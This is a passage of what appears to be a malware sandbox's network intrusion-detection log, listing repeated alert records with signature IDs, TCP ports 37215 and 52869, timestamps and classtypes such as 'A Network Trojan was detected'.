                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.678246+0200
                      SID:2835222
                      Source Port:36208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.343632+0200
                      SID:2835222
                      Source Port:36842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:55812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872000+0200
                      SID:2835222
                      Source Port:41472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.566138+0200
                      SID:2835222
                      Source Port:48872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865110+0200
                      SID:2835222
                      Source Port:56252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.956391+0200
                      SID:2835222
                      Source Port:58102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:53498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.342361+0200
                      SID:2835222
                      Source Port:33426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.648285+0200
                      SID:2027339
                      Source Port:41992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.990539+0200
                      SID:2835222
                      Source Port:57638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.839450+0200
                      SID:2835222
                      Source Port:50926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.588070+0200
                      SID:2027339
                      Source Port:48160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:43376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:34800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:49720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:57800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.598734+0200
                      SID:2835222
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.591367+0200
                      SID:2027339
                      Source Port:55308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.805042+0200
                      SID:2027339
                      Source Port:40514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:52550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.773805+0200
                      SID:2027339
                      Source Port:51380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:32.045227+0200
                      SID:2030490
                      Source Port:37550
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-20T23:05:36.359784+0200
                      SID:2835222
                      Source Port:48436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.020515+0200
                      SID:2027339
                      Source Port:34844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.829143+0200
                      SID:2027339
                      Source Port:37916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673459+0200
                      SID:2835222
                      Source Port:36542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:37702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.859645+0200
                      SID:2835222
                      Source Port:56802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.870658+0200
                      SID:2835222
                      Source Port:43878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:43720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:40564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:52162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716311+0200
                      SID:2027339
                      Source Port:40206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.549825+0200
                      SID:2835222
                      Source Port:58160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.616913+0200
                      SID:2835222
                      Source Port:58594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:34258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865440+0200
                      SID:2835222
                      Source Port:55242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.680576+0200
                      SID:2835222
                      Source Port:35268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:33442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.349447+0200
                      SID:2835222
                      Source Port:45106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:41858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:41882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:35.739880+0200
                      SID:2027339
                      Source Port:45306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.981126+0200
                      SID:2835222
                      Source Port:56910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.680576+0200
                      SID:2835222
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:42590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.679255+0200
                      SID:2835222
                      Source Port:43338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872000+0200
                      SID:2835222
                      Source Port:43764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.550338+0200
                      SID:2835222
                      Source Port:52304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.643011+0200
                      SID:2027339
                      Source Port:41800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:58174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:39.087253+0200
                      SID:2835222
                      Source Port:40774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670904+0200
                      SID:2835222
                      Source Port:37000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:34438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716310+0200
                      SID:2027339
                      Source Port:58508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.835674+0200
                      SID:2835222
                      Source Port:45738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:47510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.352367+0200
                      SID:2835222
                      Source Port:58860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.176965+0200
                      SID:2835222
                      Source Port:49638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:46142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.361899+0200
                      SID:2835222
                      Source Port:46668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:48738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.158437+0200
                      SID:2835222
                      Source Port:46322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359784+0200
                      SID:2835222
                      Source Port:35500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:47.256812+0200
                      SID:2835222
                      Source Port:42268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.693492+0200
                      SID:2027339
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.427268+0200
                      SID:2027339
                      Source Port:51110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.550808+0200
                      SID:2835222
                      Source Port:40020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.971654+0200
                      SID:2835222
                      Source Port:59200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.334366+0200
                      SID:2835222
                      Source Port:39704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:48144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354373+0200
                      SID:2835222
                      Source Port:34392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:53766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.678246+0200
                      SID:2835222
                      Source Port:58576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:53412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:54822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:60046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:38752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.499211+0200
                      SID:2835222
                      Source Port:53286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.170114+0200
                      SID:2835222
                      Source Port:49904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:48534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.682964+0200
                      SID:2835222
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865110+0200
                      SID:2835222
                      Source Port:42676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.858846+0200
                      SID:2835222
                      Source Port:46428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:37742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871999+0200
                      SID:2835222
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.095319+0200
                      SID:2027339
                      Source Port:57188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:55108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:47.137205+0200
                      SID:2835222
                      Source Port:48800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:54386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:54818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:36990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:59130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346415+0200
                      SID:2835222
                      Source Port:36390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.484056+0200
                      SID:2835222
                      Source Port:49580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611139+0200
                      SID:2027339
                      Source Port:41114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.590532+0200
                      SID:2027339
                      Source Port:45034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354742+0200
                      SID:2835222
                      Source Port:48544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:49458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:37766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:42976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:44784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.863434+0200
                      SID:2835222
                      Source Port:54158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.469869+0200
                      SID:2027339
                      Source Port:42968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871999+0200
                      SID:2835222
                      Source Port:38480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:50770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.684822+0200
                      SID:2835222
                      Source Port:37830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.860565+0200
                      SID:2835222
                      Source Port:56228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676834+0200
                      SID:2835222
                      Source Port:56896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:38590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.469976+0200
                      SID:2027339
                      Source Port:52206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.170114+0200
                      SID:2835222
                      Source Port:40440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.773805+0200
                      SID:2027339
                      Source Port:44690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.956391+0200
                      SID:2835222
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359784+0200
                      SID:2835222
                      Source Port:54780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:43414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611139+0200
                      SID:2027339
                      Source Port:44754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.342361+0200
                      SID:2835222
                      Source Port:34302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.549825+0200
                      SID:2835222
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.342361+0200
                      SID:2835222
                      Source Port:49472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359784+0200
                      SID:2835222
                      Source Port:38120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:36592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.679255+0200
                      SID:2835222
                      Source Port:59528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.693492+0200
                      SID:2027339
                      Source Port:33164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:43164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.607039+0200
                      SID:2027339
                      Source Port:33634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:54168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.648285+0200
                      SID:2027339
                      Source Port:51788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:35856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354742+0200
                      SID:2835222
                      Source Port:34922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.758693+0200
                      SID:2027339
                      Source Port:42796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716310+0200
                      SID:2027339
                      Source Port:50722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:47208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:53738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.185356+0200
                      SID:2835222
                      Source Port:42214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.658684+0200
                      SID:2835222
                      Source Port:57442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:51.764174+0200
                      SID:2835222
                      Source Port:46892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.550808+0200
                      SID:2835222
                      Source Port:33484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.678246+0200
                      SID:2835222
                      Source Port:51022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:60814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872000+0200
                      SID:2835222
                      Source Port:33640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.360018+0200
                      SID:2835222
                      Source Port:52286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:52782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:40412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:49936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:56758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.466981+0200
                      SID:2835222
                      Source Port:36190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:35.146926+0200
                      SID:2027339
                      Source Port:59138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.666649+0200
                      SID:2835222
                      Source Port:60454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:42690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.814713+0200
                      SID:2835222
                      Source Port:38174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.582815+0200
                      SID:2027339
                      Source Port:43664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.658684+0200
                      SID:2835222
                      Source Port:51144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:36368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:47408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:44458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.329793+0200
                      SID:2835222
                      Source Port:37816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:53390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:55604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:60936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.349447+0200
                      SID:2835222
                      Source Port:58208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.839450+0200
                      SID:2835222
                      Source Port:43494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.334366+0200
                      SID:2835222
                      Source Port:40050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:59298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.145992+0200
                      SID:2835222
                      Source Port:49276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.485968+0200
                      SID:2027339
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
